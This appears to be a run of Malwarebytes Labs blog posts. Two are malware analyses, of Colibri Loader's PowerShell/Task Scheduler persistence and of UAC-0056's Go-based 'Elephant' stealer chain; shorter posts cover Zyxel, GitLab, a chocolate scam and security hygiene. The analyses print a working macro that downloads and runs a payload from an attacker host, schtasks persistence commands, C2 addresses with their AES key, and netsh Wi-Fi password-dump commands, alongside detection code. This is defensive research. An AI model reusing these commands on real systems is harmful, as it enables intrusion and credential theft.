IT NEWS

Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique

This blog post was authored by Ankur Saini, with contributions from Hossein Jazi and Jérôme Segura

Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material”. As its name suggests, it is meant to deliver and manage payloads on infected computers.

Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek and independent researchers. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.

Campaign attack chain

The attack starts with a malicious Word document deploying the Colibri bot, which then delivers the Vidar Stealer. The document contacts a remote server at (securetunnel[.]co) to load a remote template named trkal0.dot that contains a malicious macro. This attack is known as remote template injection.


The macro enables PowerShell to download the final payload (Colibri Loader) as setup.exe:

Private Sub Document_Open()
zgotwed = "C:\Users\Public\setup.ex`e"
n87lcy4 = Replace("new:72Cs19e4ts4D", "s19e4ts", "2")
Set hu9v0dd = GetObject(n87lcy4 & "D5-D70A-438B-8A42-984" & CLng("1.8") & "4B88AFB" & CInt("8.1"))
hu9v0dd.exec "cm" & "d /c powers^hell -w hi Start-BitsTransfer -Sou htt`ps://securetunnel .co/connection/setup.e`xe -Dest " & zgotwed & ";" & zgotwed
End Sub

Abusing PowerShell for Persistence

Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%\Local\Microsoft\WindowsApps and names it Get-Variable.exe on Windows 10 and above, while on lower versions it drops it in %DOCUMENTS%/WindowsPowerShell under the name dllhost.exe.

On Windows 7, it creates a scheduled task using the following command:

  • schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "C:\Users\admin\Documents\WindowsPowerShell\dllhost.exe"

On Windows 10 and above, it creates a scheduled task using the following command:

  • schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr "powershell.exe -windowstyle hidden"

In the first scenario (Win7), we see a task pointing to the path of Colibri Loader. However, in the second we see an odd task to execute PowerShell with a hidden window. This is what we believe is a new persistence technique employed by the malware author.

As mentioned earlier, it drops the file with the name Get-Variable.exe in the WindowsApps directory. It so happens that Get-Variable is a valid PowerShell cmdlet (a cmdlet is a lightweight command used in the Windows PowerShell environment) which is used to retrieve the value of a variable in the current console.

Additionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

We reproduced this technique using the calculator to show how an adversary can easily achieve persistence combining a scheduled task and any payload (as long as it is called Get-Variable.exe and placed in the proper location):


A search on VirusTotal for the file name Get-Variable.exe indicates that the first malicious file uploaded to the platform happened last August, which matches with the time that Colibri appeared on XSS underground forums. That sample has the same networking features as Colibri which helps us ascertain with more confidence that the technique was debuted by Colibri.
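A hunt for the two artifacts described above, written as an added example that is not part of the original post (nor Colibri's own code): it lists executables in a directory whose names follow the Verb-Noun cmdlet convention that Get-Variable.exe abuses, and flags scheduled-task actions that launch powershell.exe with nothing but switches. The WindowsApps location is derived from the user's local application data folder, and the task strings fed to it are the two commands quoted above.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// cmdletNamePattern matches the Verb-Noun naming convention PowerShell cmdlets use
// (Get-Variable, Set-Item, ...). A real .exe carrying such a name is unusual and,
// sitting in a PATH directory such as WindowsApps, is the artifact Colibri leaves behind.
var cmdletNamePattern = regexp.MustCompile(`^[A-Z][a-z]+-[A-Z][A-Za-z]+\.exe$`)

// FindCmdletNamedExecutables walks dir and returns every file whose name looks like
// a PowerShell cmdlet. Matching is case-sensitive on purpose: the dropped file keeps
// the canonical casing so that the hijacked name looks legitimate in listings.
func FindCmdletNamedExecutables(dir string) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(dir, func(path string, d os.DirEntry, walkErr error) error {
		if walkErr != nil {
			return walkErr
		}
		if !d.IsDir() && cmdletNamePattern.MatchString(d.Name()) {
			hits = append(hits, path)
		}
		return nil
	})
	return hits, err
}

// flagsWithValue lists powershell.exe switches that consume the following token
// (-windowstyle hidden, -w hi, -executionpolicy bypass, ...), so that the value is
// not mistaken for a command. Other abbreviations PowerShell accepts are not covered.
var flagsWithValue = map[string]bool{
	"-windowstyle": true, "-w": true,
	"-executionpolicy": true, "-ep": true,
}

// IsBarePowerShellTask reports whether a scheduled-task action launches
// powershell.exe with only switches and no script, file or command: the shape of
// the COMSurrogate task Colibri registers on Windows 10 and above. A bare launch
// has no business being scheduled; it only does something if a name on PATH is
// shadowing a cmdlet.
func IsBarePowerShellTask(action string) bool {
	fields := strings.Fields(strings.ToLower(strings.Trim(action, `"`)))
	if len(fields) == 0 || !strings.HasSuffix(fields[0], "powershell.exe") {
		return false
	}
	for i := 1; i < len(fields); i++ {
		tok := fields[i]
		if !strings.HasPrefix(tok, "-") {
			return false // a script path, -Command text or -File target: not the bare form
		}
		if flagsWithValue[tok] {
			i++ // skip the switch's value
		}
	}
	return true
}

func main() {
	// On Windows os.UserCacheDir returns %LOCALAPPDATA%, the parent of WindowsApps.
	cache, err := os.UserCacheDir()
	if err != nil {
		fmt.Println("cannot locate local app data:", err)
		return
	}
	windowsApps := filepath.Join(cache, "Microsoft", "WindowsApps")
	hits, err := FindCmdletNamedExecutables(windowsApps)
	if err != nil {
		fmt.Println("walk failed:", err)
	}
	for _, h := range hits {
		fmt.Println("cmdlet-named executable on PATH:", h)
	}
	// Task actions as quoted in the analysis above; real ones would come from
	// "schtasks /query /fo csv /v" or the Task Scheduler operational event log.
	for _, action := range []string{
		`"powershell.exe -windowstyle hidden"`,
		`"C:\Users\admin\Documents\WindowsPowerShell\dllhost.exe"`,
	} {
		fmt.Printf("bare powershell task? %-60s %v\n", action, IsBarePowerShellTask(action))
	}
}
```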

Conclusion

Colibri is still in its infancy but it already offers many features for attackers and slowly seems to be gaining popularity. The persistence technique we outlined in this blog is simple but efficient and does not appear to be known.

Malwarebytes users are protected against this attack thanks to our Anti-Exploit layer:


IOCs

Word Document

666268641a7db3b600a143fff00a063e77066ad72ac659ebc77bb5d1acd5633d

setup.exe (Colibri)

54a790354dbe3ab90f7d8570d6fc7eb80c024af69d1db6d0f825c094293c5d77

install.exe (Vidar)

b92f4b4684951ff2e5abdb1280e6bff80a14b83f25e4f3de39985f188d0f3aad

The post Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique appeared first on Malwarebytes Labs.

A week in security (March 28 – April 3)

Last week on Malwarebytes Labs:

Stay safe!

The post A week in security (March 28 – April 3) appeared first on Malwarebytes Labs.

Update now! Zyxel patches critical firewall bypass vulnerability

In a security advisory Zyxel has urged customers to update because a security flaw can lead to the circumvention of firewall protection in several Zyxel products.

Zyxel is a Taiwanese producer of modems and other networking equipment and its products are sold in over 150 countries.

The vulnerability

Zyxel says the vulnerability, listed as CVE-2022-0342, is an authentication bypass vulnerability caused by the lack of a proper access control mechanism, which has been found in the CGI program of some firewall versions. The flaw could allow an attacker to bypass the authentication and obtain administrative access of the device.

The Common Gateway Interface (CGI) is an interface specification that enables web servers to execute an external program, typically to process user requests.

Affected series

Zyxel has published a list of vulnerable products that are within their warranty and support period, and has released updates to address the issue.

Affected series, affected firmware version, and patch availability:

  • USG/ZyWALL: ZLD V4.20 through ZLD V4.70; patched in ZLD V4.71
  • USG FLEX: ZLD V4.50 through ZLD V5.20; patched in ZLD V5.21 Patch 1
  • ATP: ZLD V4.32 through ZLD V5.20; patched in ZLD V5.21 Patch 1
  • VPN: ZLD V4.30 through ZLD V5.20; patched in ZLD V5.21
  • NSG: V1.20 through V1.33 Patch 4; Hotfix V1.33p4_WK11* available now, standard patch V1.33 Patch 5 in May 2022

From the security advisory it is unclear whether there are vulnerable products that are outside of the support period.

How to fix the Zyxel vulnerability

Administrators of the NSG V1.20 through V1.33 Patch 4 need to reach out to their local Zyxel support team for the file, or wait until May when standard patch V1.33 Patch 5 is scheduled to be released.

Owners of the other affected products can search for their updated firmware by model number on the Zyxel support download page. Please note that the patches should have a release date of 03/29/2022 or later.

For firewalls it is always a good idea to restrict the IP addresses that are permitted to access the management interface.

Stay safe, everyone!

The post Update now! Zyxel patches critical firewall bypass vulnerability appeared first on Malwarebytes Labs.

“Free easter chocolate basket” is a social media scam after your personal details

Holidays inspire fraudsters and scammers to create timely and effective ways to string people along and get them to give up either their money or their personal information. This is the case in this chocolate-themed scam.

Cadbury UK has issued a warning to its 315,000 followers on Twitter about a scam making the rounds on WhatsApp and other social media sites like Facebook.

Users of WhatsApp have reported receiving links to a web page where they can claim a “free Cadbury easter chocolate basket.”

When they open the link, users are presented with a short list of questions to answer—purportedly as part of an “Easter Egg Hunt”—before they are prompted to enter their personal details.

The Dorset Police Cyber Crime Unit posted an appeal about this scam to its Facebook page.

“DON’T CLICK THE LINK.” the post reads, the text bookended with the warning sign emoji. “Our Cyber Protect Officer has done it for you.”

The post continues with how the scam works:

“The site looks fairly convincing, however the only buttons that actually work are the ones to answer the questions. The search icon and the three little lines do nothing at all.

Once you answer those question [sic], you’re taken to a little game where you have to ‘find your prize’. Conveniently, your first and second tries won’t be successful, but you’ll ‘win’ on your third go! At that point, to claim your “prize”, you’ll be asked to hand over all sorts of personal information. That’s where the scam comes in!”

Looking at the shortened URL link (“tinyurl2.ru”) used in this campaign and how this scam campaign itself was formatted, it resembles the Amazon International Women’s Day 2022 Giveaway scam that is said to have gone viral in February.

It’s highly likely that scam links similar to these two can only be accessed via mobile devices.

This isn’t the first time Cadbury’s name has been dragged into a scam campaign. In December 2021, a Facebook scam about Cadbury reportedly giving away hampers of chocolate for Christmas did the rounds.

How to avoid falling for a scam like this

Warn your less security-savvy friends and family: When it comes to giveaways, think twice before clicking or sharing with friends, family, and social contacts. Scammers have always been on the prowl and do not rest until they get what they want. They are patient and have only got better at attempting to social engineer anyone who has a soft spot for anything—dogs, cats, commemorations, pizza, and, as we’ve just seen, chocolates.

Err on the side of caution. If you see a giveaway post in your feed, visit the official website of this brand to see if it’s genuine. Or, if they have a social media presence, which they usually do, ask on Twitter or Facebook. Send screenshots if you can.

It’s always a good idea to verify. But it’s not a good idea to click links thoughtlessly, and give your details away for delicious, delicious chocolate you can just buy from the shops.

Stay safe!

The post “Free easter chocolate basket” is a social media scam after your personal details appeared first on Malwarebytes Labs.

5 ways to spring clean your security

It is now officially spring in the Northern Hemisphere, and with spring and the longer days comes the inescapable urge to shake off the lethargy of winter and embrace the need to go through your stuff, throw a bunch of it out, and give the rest of it a shiny new lustre.

And in our increasingly digital lives, more and more of our stuff exists as bits and bytes on our phones, tablets, laptops and desktop computers. With the trees now full of blossom and the air prickling with pollen, you may feel an urge to straighten out your digital mess too.

If you do, we’ve got your back, and we humbly suggest that when you’re done tagging your dog in every photo and getting your folder names just so, you turn your attention to your device security and give that a little dust off as well. After all, nothing makes a bigger mess of your digital life than malware rummaging through it.

1. Say “yes” to software updates

Patching (downloading software updates) is like fixing the broken locks on the front doors of your digital life—the updates contain code that fixes weaknesses that thieves could otherwise jimmy open with their digital crowbars.

Start your spring clean by downloading all the software updates you’ve been putting off. Especially the big ones.

And yes, you’ve heard this advice before (we hope). Maybe you’ve heard it a hundred times, and maybe you’ve heard it so often that you’re tired of hearing it and are looking for some other advice. Well, fine, there’s some other advice below, but this is number one in our list for a reason, so please don’t skip it. This is the first and most important thing you can do to give your digital security a spring boost.

2. Say “no” to duplicate passwords

How many online accounts do you have? Twenty, thirty, one hundred? And how many different passwords do you have for all those accounts? If the answer to these two questions isn’t exactly the same number—meaning that you have as many different passwords as you have different accounts—then you have some cleaning up to do.

Criminal hackers love it when you use the same password for more than one account. Once they’ve done the hard work of cracking one of your passwords they aren’t going to waste it, they’re going to try it on a laundry list of other websites to see what else it can unlock for them. It’s like a twofer at the grocery store for them: Hack one account, get one free!

The way to stop this is to create a unique password for each of your accounts, no exceptions. If you’re up for a deep clean then get yourself a password manager to make the job of creating and storing all those passwords easy. It’s a little more effort upfront, but well worth it.

3. Lose what you don’t use

We’re going to leave you to decide where you want to take this one and how far you want to go with it. We’ll just get you started with this simple line of thinking: From a security perspective, “more” is often worse. More apps means more places a hacker might find a broken lock or an open window they can use to break into your device. The same thing goes for your online accounts—each one is a potential way in to your digital life (particularly the accounts you haven’t used for a while, aren’t paying much attention to, or didn’t bother to lock down very well).

It’s amazing how many rarely-if-ever-used apps we accumulate on our devices, and how many accounts we open and then abandon online.

So why not lose some things? Ditch some apps you don’t need, clear out your unused browser add-ons, and delete some accounts you don’t use. The more you lose, the better.

4. Get on top of your email

Criminals use email to spread malware, fakes, and scams, so it is worth paying some attention to. Getting your unread email count to zero is immensely satisfying, and if you do it the right way it can give your security a spring in its step too.

Start by unsubscribing from all the mailing lists and newsletters you never read. You want the email that arrives in your inbox to be full of things that actually interest you, so it’s easier for you (and your spam filter) to spot anything that is slightly off. It’s just like step #3—lose what you don’t use.

Now go through your email and mark the things that look like scams, spams, malware, or junk as “Junk” or “Spam.” Every time you do that instead of just deleting shady emails you are actually training your email’s spam filter to work more effectively (if you want to know why, read our article on Bayesian Filtering). To work correctly your spam filter needs a few thousand up-to-date examples of both “good” emails and “bad” emails, so you want your inbox to be full of good things you care about, and your spam folder to be full of bad things that are malicious or spammy.

5. Run a malware scan

Spring cleaning is about the satisfaction of a job well done, and the peace of mind that comes with knowing your environment isn’t harbouring any nasties. To get that same sense of inner calm from your computer, put down the bleach and pick up a malware scanner.

A malware scanner is the quintessential deep clean for your device. It will pick over your files and apps, one by one, and run through them with a fine tooth comb, weeding out any malware that’s lurking in there undetected.

Now, we’re going to toot our own horn a little on this one. We try to give good, sensible, impartial advice on this blog, without somehow making everything about us and the things we make. Well it so happens that our scans are famous for their ability to pick up things that others miss, and it wouldn’t make any sense if we didn’t mention it when other people will happily tell you the same thing. So, if you want to scrub all the dark and difficult corners of your desktop or laptop computer, we honestly think the best advice we can give you is to run our anti-malware scanner. Sorry, not sorry.

The post 5 ways to spring clean your security appeared first on Malwarebytes Labs.

GitLab issues security updates; watch out for hard coded passwords

GitLab has issued several critical security updates, with users of the version control software urged to upgrade their installations as soon as possible. One of the fixes is for a hard coded password issue.

What is distributed version control?

Distributed version control is a way for an organisation’s codebase to be mirrored on the devices of anyone who needs access. Where people occasionally become confused is when they see a number of services using the word “Git” in their name. They’re not all the same thing, and we shouldn’t unnecessarily worry that one issue affects lots of different services due to naming conventions.

Are GitHub and GitLab the same thing?

They are not! If you’re reading about this update, you’re reading about an update for users of GitLab specifically. GitHub isn’t affected by this, and so users shouldn’t worry about missing security updates for hard-coded passwords. Hub and Lab are similar, but most definitely not the same.

What’s happened with GitLab?

There’s been a critical security release, addressing multiple issues. No fewer than 17 elements have been addressed, with one rated critical, two rated high, and nine rated medium. Here’s the rundown of the issue rated critical from their release page:

Static passwords inadvertently set during OmniAuth-based registration

A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts. This is a critical severity issue (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, 9.1). It is now mitigated in the latest release and is assigned CVE-2022-1162.

This vulnerability has been discovered internally by the GitLab team.

Note: We executed a reset of GitLab.com passwords for a selected set of users as of 15:38 UTC. Our investigation shows no indication that users or accounts have been compromised but we’re taking precautionary measures for our users’ security.

What are hardcoded passwords, and why are they bad?

Hardcoded passwords, also known as embedded credentials, make using the software or device they’re attached to a risky business. If your cheap, off the shelf router has the same single password in use for every single device, that’s bad. Someone who owns one of these devices now knows the password for all of those devices. If your forum software has a single, unchangeable password buried in the code, that’s bad. Somebody with dubious intentions may well have the keys to the kingdom for all versions of that forum.

It’s a similar story here – with a few caveats. According to The Register, accounts created through OmniAuth using fewer than 21 characters for the password were vulnerable to the default password. A script has also been released which, in GitLab’s words, “…can be used by self-managed instance admins to identify user accounts potentially impacted by CVE-2022-1162”.

Time to update

If you think you may be impacted by this, make haste and check out the list of updates. You don’t want to leave an easy way in for attackers to exploit your business.

The post GitLab issues security updates; watch out for hard coded passwords appeared first on Malwarebytes Labs.

New UAC-0056 activity: There’s a Go Elephant in the room

This blog post was authored by Ankur Saini, Roberto Santos and Hossein Jazi.

UAC-0056 also known as SaintBear, UNC2589 and TA471 is a cyber espionage actor that has been active since early 2021 and has mainly targeted Ukraine and Georgia. The group is known to have performed a wiper attack in January 2022 on multiple Ukrainian government computers and websites.

Earlier in March, Cert-UA reported UAC-0056 activity that targeted state organizations in Ukraine using malicious implants called GrimPlant, GraphSteel as well as CobaltStrike Beacon. Following up with that campaign, SOCPRIME and SentinelOne have reported some similar activities associated with this actor.

In late March, the Malwarebytes Threat Intelligence Team identified new activity from this group that targeted several entities in Ukraine, including ICTV, a private TV channel. Unlike previous attacks, which tried to convince victims to open a URL and download a first stage payload or distributed fake translation software, in this campaign the threat actor is using a spear phishing attack that carries macro-embedded Excel documents. In this blog post, we provide a technical analysis of this new campaign.

Attack process

The following picture shows the overall attack procedure used by this actor. The attack starts with malicious documents sent as attachments to a phishing email. The document contains a malicious macro that drops a payload embedded within the document. The next stage payloads are downloaded from the attacker’s server in Base64 format.

Figure 1: Attack process

Phishing email

The actor distributed phishing emails at least from March 23rd to March 28th. The email subject is Заборгованість по зарплаті (wage arrears) and the body of all the emails is the same:
Заборгованість по зарплаті. Оновлюється автоматично. Просимо надіслати вашу пропозицію для скорочення заборгованості по зарплаті. (Wage arrears. Updated automatically. Please send your offer to reduce your salary arrears.)

Figure 2: Phishing email

Excel document

The attached document has the same name as the email subject, “Заборгованість по зарплаті”, and it seems the actor used a legitimate document as a decoy.

Figure 3: Macro-embedded Excel document

This document contains an embedded macro that drops the first stage payload, called “base-update.exe”. The payload is stored in a “very hidden sheet” named “SheetForAttachedFile”. The sheet contains the filename, the date the payload was attached (21st March 2022), the file size and the content of the attached file in hex format.

Figure 4: Hidden sheet

The macro reads the content of the embedded file from the hidden sheet and writes it to the location defined for this payload, the “AppData\Local\Temp” directory. The macro used by the actor is taken from a website that described, and provided code for, a method to attach files to and extract them from an Excel workbook.

Figure 5: Macro

Elephant Dropper (Base-Update.exe)

Elephant Dropper is the initial executable deployed in this attack; as the name suggests, it is a simple dropper that deploys further stages. This executable is written in the Go programming language and is signed with a stolen Microsoft certificate. The strings in the binary suggest that it was actually named Elephant Dropper by the attackers themselves.

It checks whether the “C:\Users\{user}\.java-sdk” directory exists on the system and creates it if it does not. The strings in the binary are encoded and are only decoded when they are needed.
The dropper decodes the C2 address from a string, then downloads a Base64 encoded binary from the C2 and writes it to “C:\Users\{user}\.java-sdk\java-sdk.exe”. Judging from the strings present, this downloaded binary is named Elephant Downloader by the attackers. java-sdk.exe is then executed by the dropper with the argument “-a 0CyCcrhI/6B5wKE8XLOd+w==”. The “-a” refers to address, and the Base64 string is the C2 address in AES encrypted form.

Figure 6: Elephant Dropper

Elephant Downloader (java-sdk.exe)

Elephant Downloader is also written in the Go programming language and is executed by the Dropper. The main purpose of this payload is to maintain persistence on the system and to deploy the next two stages of the attack. The strings in this executable are encoded in the same way as in the Dropper. It makes itself persistent through the auto-run registry key: it creates a value under “Software\Microsoft\Windows\CurrentVersion\Run” named “Java-SDK” with the data “C:\Users\{user}\Desktop\java-sdk.exe -a 0CyCcrhI/6B5wKE8XLOd+w==”.

Figure 7: Registry key for persistence

The downloader is responsible for getting the implant and the client; the URL paths for the payloads are stored in encoded form in the binary. It downloads the implant and the client from http://194.31.98.124:443/m and http://194.31.98.124:443/p respectively in Base64 encoded format.

After this, it decodes the file names which are stored as well in encoded format and creates the file in the earlier mentioned directory .java-sdk. The file name of the implant is oracle-java.exe and the client is microsoft-cortana.exe. The downloader executes both payloads and passes “-addr 0CyCcrhI/6B5wKE8XLOd+w==” as arguments to both. Again the Base64 string is the C2 address in AES encrypted format.

Figure 8: Implant and client being dropped

Elephant Implant (oracle-java.exe)

Elephant Implant (also tracked as the GrimPlant backdoor) seems to be one of the most important payloads in this attack. This executable communicates with the C2 on port 80. As in the earlier payloads, the strings in this binary are encoded in the same fashion, and it also receives the encrypted C2 address from its parent process. The implant uses gRPC to communicate with the C2; it has a TLS certificate embedded in the binary and makes use of the SSL/TLS integration in gRPC, which lets the malware encrypt all the data it sends to the C2.

Figure 9: Embedded TLS certificate in the implant

The implant uses the MachineID library to derive a unique id for each machine. It also gets the IP address of the machine by making a request to “https://api.ipify.org/”.
It also collects information related to the OS in a function named GetOSInfo, as part of this the malware collects the hostname, OS name and number of CPUs in the system. A function named GetUserInfo collects the Name, Username and path to Home directory of the current user.

Figure 10: getSystemInfo function

The Implant can communicate with the C2 by using 4 types of RPC requests:

  • /Implant/Login – This is the initial RPC request sent to the C2. Along with this RPC request, the previously retrieved ID and system information are sent to the C2 as well.
  • /Implant/FetchCommand – This RPC request is used to retrieve the command that the actor wants to execute on the target machine. The retrieved command is executed via “%windir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe”. An AdminId and the Command to be executed are received as the response to this request.
  • /Implant/SendCmdOutput – This is used to send the output of an executed command to the C2. An AdminId and the Command Output are sent with this request.
  • /Implant/Heartbeat – A Heartbeat RPC request is made to the C2 at regular intervals to report status. The machine id and the system info retrieved earlier are sent with this request.

Figure 11: RPC requests

Elephant Client (microsoft-cortana.exe)

The last payload described in this blog is the one named elephant_client by the actor (also tracked as the GraphSteel backdoor). Its functionality suggests that this final payload is a data stealer.
Like the other payloads in this attack chain, this payload receives the C2 server as a Base64 parameter (0CyCcrhI/6B5wKE8XLOd+w==), which is the AES encrypted form of the server address. Decoding the Base64 string gives us the C2 IP address in AES encrypted form: d02c8272b848ffa079c0a13c5cb39dfb. The actor uses the following key to AES decrypt (ECB, NoPadding mode) the C2 address: F1D21960D8EB2FDDF2538D29A5FD50B5F64A3F9BF06F2A3C4C950438C9A7F78E.
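The C2 recovery chain just described, worked through as an added example (not the actors' code and not Malwarebytes tooling): Base64 decode the -addr argument, AES-256-ECB decrypt the single block with the published key, and strip the filler that NoPadding leaves behind. Go is used because the Elephant stages are Go binaries and its standard library carries AES; treating trailing NUL and space bytes as filler is an assumption, and the post reports the decrypted value as 194.31.98.124.

```go
package main

import (
	"crypto/aes"
	"encoding/base64"
	"encoding/hex"
	"fmt"
	"strings"
)

// Values quoted in the analysis above: the "-addr"/"-a" argument handed to every
// Elephant stage and the AES key recovered from the client.
const (
	encodedAddr = "0CyCcrhI/6B5wKE8XLOd+w=="
	keyHex      = "F1D21960D8EB2FDDF2538D29A5FD50B5F64A3F9BF06F2A3C4C950438C9A7F78E"
)

// DecodeAddrArg turns the Base64 argument into the raw AES ciphertext.
func DecodeAddrArg(arg string) ([]byte, error) {
	return base64.StdEncoding.DecodeString(arg)
}

// DecryptECBNoPadding decrypts ciphertext with AES in ECB mode. Go's standard
// library deliberately ships no ECB type, so each 16-byte block is decrypted
// independently, which is all ECB is. NoPadding means the length must already be
// a whole number of blocks; the 16-byte ciphertext above is exactly one block.
func DecryptECBNoPadding(key, ciphertext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(ciphertext) == 0 || len(ciphertext)%bs != 0 {
		return nil, fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ciphertext), bs)
	}
	plaintext := make([]byte, len(ciphertext))
	for i := 0; i < len(ciphertext); i += bs {
		block.Decrypt(plaintext[i:i+bs], ciphertext[i:i+bs])
	}
	return plaintext, nil
}

// RecoverC2 runs the whole chain the post describes: Base64 -> ciphertext ->
// AES-256-ECB plaintext -> C2 string. A 13-character IP inside a 16-byte block
// leaves filler; trailing NUL and space bytes are stripped on the assumption that
// this is what the actor padded with.
func RecoverC2(arg, keyHex string) (string, error) {
	key, err := hex.DecodeString(keyHex)
	if err != nil {
		return "", fmt.Errorf("bad key hex: %w", err)
	}
	ct, err := DecodeAddrArg(arg)
	if err != nil {
		return "", fmt.Errorf("bad base64 argument: %w", err)
	}
	pt, err := DecryptECBNoPadding(key, ct)
	if err != nil {
		return "", err
	}
	return strings.TrimRight(string(pt), "\x00 "), nil
}

func main() {
	ct, err := DecodeAddrArg(encodedAddr)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Printf("ciphertext: %s\n", hex.EncodeToString(ct)) // d02c8272b848ffa079c0a13c5cb39dfb
	c2, err := RecoverC2(encodedAddr, keyHex)
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Printf("C2 address: %q\n", c2)
}
```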

Once the sample has established its connection with its C2 server, it starts collecting data and exfiltrating it to the server. At first it collects some basic info about the user and sends it to the server, as shown in Figure 12 (some info has been removed for privacy). The collected data is Base64 encoded and includes hostname, OS name (windows), number of CPUs, IP address, Name, Username and home directory.

Figure 12: Collect user info

After that, the client tries to steal credentials from the victim’s machine. The actor steals data from the following services:

  • Browser credentials
  • WiFi information
  • Credentials manager data
  • Mail accounts
  • Putty connections data
  • Filezilla credentials

We installed some of these services for testing purposes. Figure 13 shows how the stolen data is sent to the C2 server:

Figure 13: C2 communications

Base64 decoding data shows what data has been exfiltrated:

Figure 14: Stolen data

For example, to recover Wi-Fi data, the command netsh wlan show profiles (which lists all SSIDs saved on the machine) is used. Once all the SSIDs are gathered, if any, it launches netsh wlan show profile [SSID] key=clear for each of them, revealing all saved Wi-Fi passwords:

Figure 15: Wi-Fi data exfiltration commands

The following image shows an example of the command execution, where you can see some of the commands executed in the process:

Figure 16: Used commands

Figure 17 shows another example of exfiltration in which an encoded PowerShell command is used to steal the data from the Secure Vault:

Figure 17: PS command for exfiltration
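Detection logic for the two stealer behaviours just described, as an added example that is not part of the original post: it scans process command lines for netsh wlan profile dumps with key=clear and for PowerShell launched with -EncodedCommand, decoding the latter so an analyst sees the script text. The log lines are constructed, and the encoded script (Get-Process) is a stand-in, since the post does not reproduce the actual Secure Vault command.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Finding is one flagged process command line.
type Finding struct {
	Line    string
	Reason  string
	Decoded string // the script behind -EncodedCommand, when that rule fired
}

// EncodeCommand produces what PowerShell expects after -EncodedCommand: Base64 over
// the UTF-16LE bytes of the script. It is used here only to build a realistic sample.
func EncodeCommand(script string) string {
	u := utf16.Encode([]rune(script))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

// DecodeEncodedCommand reverses EncodeCommand so the analyst sees the script text.
func DecodeEncodedCommand(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", fmt.Errorf("%d bytes is not UTF-16LE", len(raw))
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// Inspect applies two rules drawn from the GraphSteel behaviour above:
//  1. netsh wlan show profile <SSID> key=clear dumps a saved Wi-Fi passphrase;
//     "show profiles" alone is the enumeration step and is left for correlation.
//  2. powershell -EncodedCommand (or any abbreviation down to -e) hides the script;
//     the payload is decoded and attached to the finding.
func Inspect(cmdline string) (Finding, bool) {
	lower := strings.ToLower(cmdline)
	if strings.Contains(lower, "netsh") && strings.Contains(lower, "wlan") &&
		strings.Contains(lower, "key=clear") {
		return Finding{Line: cmdline, Reason: "netsh wlan profile dump with key=clear"}, true
	}
	if strings.Contains(lower, "powershell") {
		fields := strings.Fields(cmdline)
		for i := 0; i+1 < len(fields); i++ {
			sw := strings.ToLower(fields[i])
			if len(sw) >= 2 && strings.HasPrefix("-encodedcommand", sw) {
				decoded, err := DecodeEncodedCommand(fields[i+1])
				if err != nil {
					decoded = "<undecodable: " + err.Error() + ">"
				}
				return Finding{Line: cmdline, Reason: "encoded PowerShell command", Decoded: decoded}, true
			}
		}
	}
	return Finding{}, false
}

// Scan runs Inspect over a batch of command lines.
func Scan(lines []string) []Finding {
	var out []Finding
	for _, l := range lines {
		if f, ok := Inspect(l); ok {
			out = append(out, f)
		}
	}
	return out
}

// SampleLines are constructed process-creation command lines (not captured from the
// campaign); a real feed would come from Sysmon event 1 or EDR telemetry.
var SampleLines = []string{
	`C:\Windows\System32\netsh.exe wlan show profiles`,
	`C:\Windows\System32\netsh.exe wlan show profile "OfficeNet" key=clear`,
	`powershell.exe -nop -w hidden -enc ` + EncodeCommand("Get-Process"),
	`C:\Program Files\Git\bin\git.exe status`,
}

func main() {
	for _, f := range Scan(SampleLines) {
		fmt.Printf("%s\n  reason: %s\n", f.Line, f.Reason)
		if f.Decoded != "" {
			fmt.Printf("  decoded: %s\n", f.Decoded)
		}
	}
}
```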

In addition to stealing credentials, the actor steals all the files from the victim’s machine. To collect the data it iterates through all the files in the user directory and hashes each of them. All of these collected hashes are sent to the actor’s C2 server. Finally, the malware sends all these files to the attackers.
Note that all the collected data is AES encrypted before being sent to the C2 server, so packet inspection will not reveal any useful information.

Figure 18: Stealing files activity

Conclusion

UAC-0056, aka UNC2589, TA471, or SaintBear, is an active actor that has been performing cyber espionage campaigns against Ukraine since 2021. The group is known to have performed the WhisperGate disruptive attack against Ukrainian government entities in early 2022. Recently we observed new activity associated with this actor that used macro-embedded Excel documents to drop its malicious software on victims’ machines. In this blog we provided a technical analysis of this campaign.


The Malwarebytes Threat Intelligence team continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.

IOCs

Emails:
